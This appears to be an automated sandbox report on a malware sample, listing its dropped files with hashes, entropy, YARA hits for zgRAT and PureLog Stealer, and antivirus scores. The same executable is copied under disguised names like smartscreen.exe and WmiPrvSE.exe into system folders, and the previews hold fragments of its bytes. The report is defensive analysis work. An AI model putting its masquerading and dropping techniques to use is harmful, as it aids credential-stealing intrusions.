                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3615744
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          MD5:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          SHA1:8B0D6E459D66346E8DBA5A0D857B4B192871D437
                                                                                                                          SHA-256:08E4F00E67200C00552466FC1179A23D17F4C7497AFE89C4D5D4B6D8878216F4
                                                                                                                          SHA-512:E7ADB1A4D6B91740BD537197A944B5254A161D955669D7E26CAA51DABDF9610DDF16BB41B8D179F15C2D5B19C0152E248620F9CB6EBAE31C480210288859E4B6
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@..................................A7.K....`7. .....................7...................................................... ............... ..H............text...$"7.. ...$7................. ..`.rsrc... ....`7......&7.............@....reloc........7......*7.............@..B.................B7.....H.......h...$................W,.FA7......................................0..........(.... ........8........E....N...).......*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E............>...............8.......... ....8....~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....<y... ....~....{....9o...& ....8d...8`... ....~....{....9K...& ....8@...~....(8... ...

                                                                                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Program Files (x86)\Microsoft\EdgeWebView\Application\6562cf32ce99ca

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with very long lines (997), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):997
                                                                                                                          Entropy (8bit):5.907010297533935
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:s+nW50kbP1RTcm1UxClKGyKD6S+Y02W1faNCneBvQutuJXwoXm:nnW5/jIm1UxCpD6vYeJCEelQpzm
                                                                                                                          MD5:7E3E388353BDF3DCC4FFF32782A09DFD
                                                                                                                          SHA1:01CB6DBDA229A6344543331DB586240C50A25687
                                                                                                                          SHA-256:7BF5960CB40B74F2C6F4ED7F66133A70AFDDF2CA17318FBF73F353B2A5268B09
                                                                                                                          SHA-512:69E63FCA27E0D7772B2BF4B661634E8F2CC490C09B5D1B6A2EF9CAA25B3FFFAAF0E303F131BAD4B8B6476A3DFE642E446AD23BB9DA7E9450149465EDC259E21C
                                                                                                                          Malicious:false
                                                                                                                          Preview:Ez2rmYAVTVHvcTK3RJIoBE5oTtE5nmYdPwgK16m4lrbuCyUKmTXJdi7A3NX2TFrr6ofpw9CVhNDUmLmfY4STOO9rzgRnitlf9uxXSpXnRCmQfnYsk2eZwXcspy0QsYxxlhV1YONtgpCMmsMLHjCpPMslSEsdyH53Oyp7RgTWpu3HVPG6moIIVHhZytjTgt4ZuI7xDO4kPqAeTlQC8w0J8wiHQPIh7Az50eXNST3Yuh3oGDGNdgUu2ua8k0gxFWnP0FoyODup2cZa33ANJ5EbpFCFDYmcwFSY4oxBYR8awp1ZVAFqzSoKSMjvCjvzaS3xKBfPG8z17noAOmuCT6mdbIFsEC9zfI9ewEPTezk1dwMohjgZysfepZVC5xKD99VyoKOKXbidVvAo5bKffjAxnfyWsMXrpg1daYAXUVCXKBJ4ZrHdmpha9iKIV1cKD0yy3gNgbxKJgnmlW37AF4EA9be1N1Bd32UTNUB2dkBzeY3V6jwc3bEIwyzcBWSkvrQoSSYB2Ehf2OfliJ5oFjjbxLgZfi1HSbEwHOCnLujz4jQiSO42aofMIy1Hv9gTNZNbKsdTGRdV9uhO58GQo8qo61oSX51MNPleWyXjukwJKJMYRnMx2PoOtjfSEK5KZRHtIC1GkgfEMhdwpPButET7kWvxTFfkolt3CdQPvFMVukCMFsnyJLaV7KIvREwfB5ZkyjuL9w9n27NAUirlbqbdLY51Ue7qTqUyLbXf8byXMwc96IbsXLDUe5Zao21fySUMnYy2KLmA2DQY554LDOSHm9UPC71GkTi3cQWiUihMiDcaoBes7pcj9MjoEi0NTgajfW5pjW1frGjjg3kBdJI4184PqsdvrU2Cn35SFzIkx622nAHL7ztKYfrgcq913FxWOg5n8S5oAhH4GBlplSy2ksoILYzYzRrsJfoGEdMo3FJ0YxZbETPlR5vf2xbjdgyszYvkWelHFK8fjxuX8XUgCGbNuJORBmKWRaA9C

                                                                                                                          C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3615744
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          MD5:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          SHA1:8B0D6E459D66346E8DBA5A0D857B4B192871D437
                                                                                                                          SHA-256:08E4F00E67200C00552466FC1179A23D17F4C7497AFE89C4D5D4B6D8878216F4
                                                                                                                          SHA-512:E7ADB1A4D6B91740BD537197A944B5254A161D955669D7E26CAA51DABDF9610DDF16BB41B8D179F15C2D5B19C0152E248620F9CB6EBAE31C480210288859E4B6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@..................................A7.K....`7. .....................7...................................................... ............... ..H............text...$"7.. ...$7................. ..`.rsrc... ....`7......&7.............@....reloc........7......*7.............@..B.................B7.....H.......h...$................W,.FA7......................................0..........(.... ........8........E....N...).......*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E............>...............8.......... ....8....~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....<y... ....~....{....9o...& ....8d...8`... ....~....{....9K...& ....8@...~....(8... ...

                                                                                                                          C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Program Files (x86)\jDownloader\2afe4ed40d5a86

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with very long lines (415), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):415
                                                                                                                          Entropy (8bit):5.844094922568622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:qgGoG2mpgGQtNVcG/nV+yYcIf92yDc72epiHQ0EIIAySO4Ig3ABJU7GTx8XFKjH6:5a2CDWLcG/hq9NZwxLpSO+38JRIhCsKg
                                                                                                                          MD5:77CB99F8C0C5F377959AF322E8BBF159
                                                                                                                          SHA1:B9D1A31FCA757EDC0FC382BD1DDF62191E16FD5F
                                                                                                                          SHA-256:D14C30AF26913C923D15FCCD85CA85D0E41155ECBA6D5D8BDF0A0368DD188B9D
                                                                                                                          SHA-512:C8263CEE0A661C8C58BA625C2D816D7E5FB85E4BBAD4A089011BF8C5B4C73563E455CE0377514DCA113812A7491D6FE977BD21A9386C5ECD03B3A8ECA75B0C39
                                                                                                                          Malicious:false
                                                                                                                          Preview:2PKvQhNdj4bsDnq8ULP6gPrHcfViOccSSdyOPi7EmPierScu1TrBvS3mhDTuMoPGbIajycswOKTRqMZJCkr5vbg9kLqMOM28AcDi235Yk4wk8m5VoKrl7TVAma8nwghBSVROJ0RJpSV0p6B8PUiEfQBqGC6b4SmDWuRmVrMx3h6o8eVpZ9Xb8dgBUkHG3zOXqRe4oYniIuL7UXrmrRC44LF3OPSujG4DTj7rAaAAWzTORjr72fYmxTcfMkqYG38CzIouZAlQQBiE10loiV1ErSP9GceZul4d1RYJ56h13IVvvXnV9B0uB4Uh2oo6gMfoHFNkcbtlxAKj6dNtzJZtuJb760RQSlVrmqoqKC2iRP7BtvkYb4HWww38nQolKdSMoc7QzhjwQ1bfLaNKQ2zXd85zwqC4YRY

                                                                                                                          C:\Program Files (x86)\jDownloader\smartscreen.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3615744
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          MD5:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          SHA1:8B0D6E459D66346E8DBA5A0D857B4B192871D437
                                                                                                                          SHA-256:08E4F00E67200C00552466FC1179A23D17F4C7497AFE89C4D5D4B6D8878216F4
                                                                                                                          SHA-512:E7ADB1A4D6B91740BD537197A944B5254A161D955669D7E26CAA51DABDF9610DDF16BB41B8D179F15C2D5B19C0152E248620F9CB6EBAE31C480210288859E4B6
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\smartscreen.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\smartscreen.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@..................................A7.K....`7. .....................7...................................................... ............... ..H............text...$"7.. ...$7................. ..`.rsrc... ....`7......&7.............@....reloc........7......*7.............@..B.................B7.....H.......h...$................W,.FA7......................................0..........(.... ........8........E....N...).......*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E............>...............8.......... ....8....~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....<y... ....~....{....9o...& ....8d...8`... ....~....{....9K...& ....8@...~....(8... ...

                                                                                                                          C:\Program Files (x86)\jDownloader\smartscreen.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Program Files\Windows Mail\6562cf32ce99ca

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with very long lines (308), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):308
                                                                                                                          Entropy (8bit):5.791394589259776
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:kXqS0QXQWqaFWo7sMaddRfQEEZANsoNZ0/CQtdzpmiw2s8sCvz/EY185CVc+:k6XClMZMadj1EZAHZ0/CQLMt2dZzhdb
                                                                                                                          MD5:3D1F7988FCD106B13E00C192B785026A
                                                                                                                          SHA1:63B56B1F87C3D68AFBDAEF320C4D02D7C8D671F7
                                                                                                                          SHA-256:730FAD2EEE43915F7F441C9B58A94E6FFCF915BE2CD2298A9A478A2CAA9382E0
                                                                                                                          SHA-512:AC7A049217276D2DC845C250C0C28A348E1CBA55049A5309CE2FDD188511001715CE0F1FDD3B11521A011724D2E597E38E5504708DE0347BB6591A8AA3B50BED
                                                                                                                          Malicious:false
                                                                                                                          Preview:6kNK20nsraXWkhgPJ549El9HXWS2teBg67pT9GDwiJI9XLSt1u2AqbOVkGwfhv9MZ1am1NQC1Ib4cAtMDjA9lAzfsUs2UhPxK5jfvp1oe0JiAT2kWkb7uAkZC44heXsT3nuhaNaYrWfv1QfZcHgtGRDJVKd0vUKGHzpWjVJIJDPYeyivZfEW18NlkkMQukmXMYnBlIzH8XjCBppgmsaQPxPJlDw8J3Yjb2LGLgJQp7YdYLj45qoBJWIYIeahW17E8AlJdiUGiJlRYvuad1DdPXZEux7qFm4x9UeYjabWVic9v09Xu9De

                                                                                                                          C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3615744
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          MD5:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          SHA1:8B0D6E459D66346E8DBA5A0D857B4B192871D437
                                                                                                                          SHA-256:08E4F00E67200C00552466FC1179A23D17F4C7497AFE89C4D5D4B6D8878216F4
                                                                                                                          SHA-512:E7ADB1A4D6B91740BD537197A944B5254A161D955669D7E26CAA51DABDF9610DDF16BB41B8D179F15C2D5B19C0152E248620F9CB6EBAE31C480210288859E4B6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@..................................A7.K....`7. .....................7...................................................... ............... ..H............text...$"7.. ...$7................. ..`.rsrc... ....`7......&7.............@....reloc........7......*7.............@..B.................B7.....H.......h...$................W,.FA7......................................0..........(.... ........8........E....N...).......*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E............>...............8.......... ....8....~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....<y... ....~....{....9o...& ....8d...8`... ....~....{....9K...& ....8@...~....(8... ...

                                                                                                                          C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:false
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Recovery\24dbde2999530e

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with very long lines (943), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):943
                                                                                                                          Entropy (8bit):5.904806283188083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:buSVL8k49FqpNL5DURwDYGwRumNgWuYVSfNayV1Vq:bnc9gp16KYGwUHWLeNayVjq
                                                                                                                          MD5:829B61F45ED7DA4BDDDE89065C7E221C
                                                                                                                          SHA1:0DBB086F1E9763263209ADB26B85D7421A2DF529
                                                                                                                          SHA-256:9772CD9DB7D47CD9FCCF0ACC2ECC9C02B8C21906AD2F79211478A7B0CA79A09E
                                                                                                                          SHA-512:76F66D650F59D8DFD33750C4078AE1D391E7FCD2E5B1E745C7D1D055C70305DD33718D24473D3380CCBA024C1BD24E753C38A5173623BA20A28BD9E7C3B31F12
                                                                                                                          Malicious:false
                                                                                                                          Preview:OxRERW0DaqHr4ZT3xk6Gja9ef2wDBvvqhgv7j5FXI9DIXHrLMg2Ar3XyxwjYjxCp4aJYoVU2ei7jW1HYLl0e2v9oI6KwWryV7YO67Sh0LAgJ6yb6oKM87hwIbfPrLifwull7nLb2D9T2PzrUeOHLe0YamFebCzpnetZUMeTdtT47O43my5N7aUR3NLVhr9zOUpXfaWHA4obL5aMsL2nHmsNJbfHBJvvtepnigXLbyMCw2G7w9mWzWsmmcNE5PF1J2rqQxnLxqLSZpbRUhUCgZ5XvDAGSTQMsV23KZr8VaiJLZN6B6uX4DUu6U5Nwg3ea8kDxiG4zVqF1wMV0EFWi2RpBI60eeLyhDsMzJJczzijWO2JHjWsbg5hr4ColQaVJ1ixEAgq5mgtUsSwPws4HdXAHKf4He0jZMZfqFFHDqwz9MN8mPYzifNqehq3elibv7THSwGKqk0briB47gS2FBB49tBJYMmcHUDC3GpzIOJ7pw86gv68SqVu6ZIjv7ve7XTWe8B00ct11DPMuFnnPoJa9TGd7GELcp9RdlchtFIz7d22K6yqTIOTN2XK2h2tYhZMD7sJnF3KfUdfbNTBRX2TbqDkORoMMYbaEqyMNpCOODx3Z1toO0bApFuX4I4Var7G2DauZHymVnFX2JLWiA8W6au95aSFurxhGqAVa8PGCzpBAXfu6ixatlKcSbz8yt2n0hQLJ05jv1THut8h5hIM3WxfghD9IQRS6CKcGTlGmNp2RCsjcRDRkptetvolw6aejBKsigbl6Ckqq5Oezdg1NArQSqsVoATpwLSP1AA60bViFDxxhKvTajRiT3a2xF65s43fm8mzdjAwpJLO24yePAPN3u67jHIveZzLKRLih5z0jf2JsMA2Rcqspql2BoPWaPRQT9DktP6TKYoY1wPXGQdBsGfepSg3qdaTNmzsIZIB

                                                                                                                          C:\Recovery\WmiPrvSE.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3615744
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          MD5:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          SHA1:8B0D6E459D66346E8DBA5A0D857B4B192871D437
                                                                                                                          SHA-256:08E4F00E67200C00552466FC1179A23D17F4C7497AFE89C4D5D4B6D8878216F4
                                                                                                                          SHA-512:E7ADB1A4D6B91740BD537197A944B5254A161D955669D7E26CAA51DABDF9610DDF16BB41B8D179F15C2D5B19C0152E248620F9CB6EBAE31C480210288859E4B6
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@..................................A7.K....`7. .....................7...................................................... ............... ..H............text...$"7.. ...$7................. ..`.rsrc... ....`7......&7.............@....reloc........7......*7.............@..B.................B7.....H.......h...$................W,.FA7......................................0..........(.... ........8........E....N...).......*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E............>...............8.......... ....8....~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....<y... ....~....{....9o...& ....8d...8`... ....~....{....9K...& ....8@...~....(8... ...

                                                                                                                          C:\Recovery\WmiPrvSE.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Recovery\WmiPrvSE.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\r6cRyCpdfS.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1915
                                                                                                                          Entropy (8bit):5.363869398054153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                                          Malicious:true
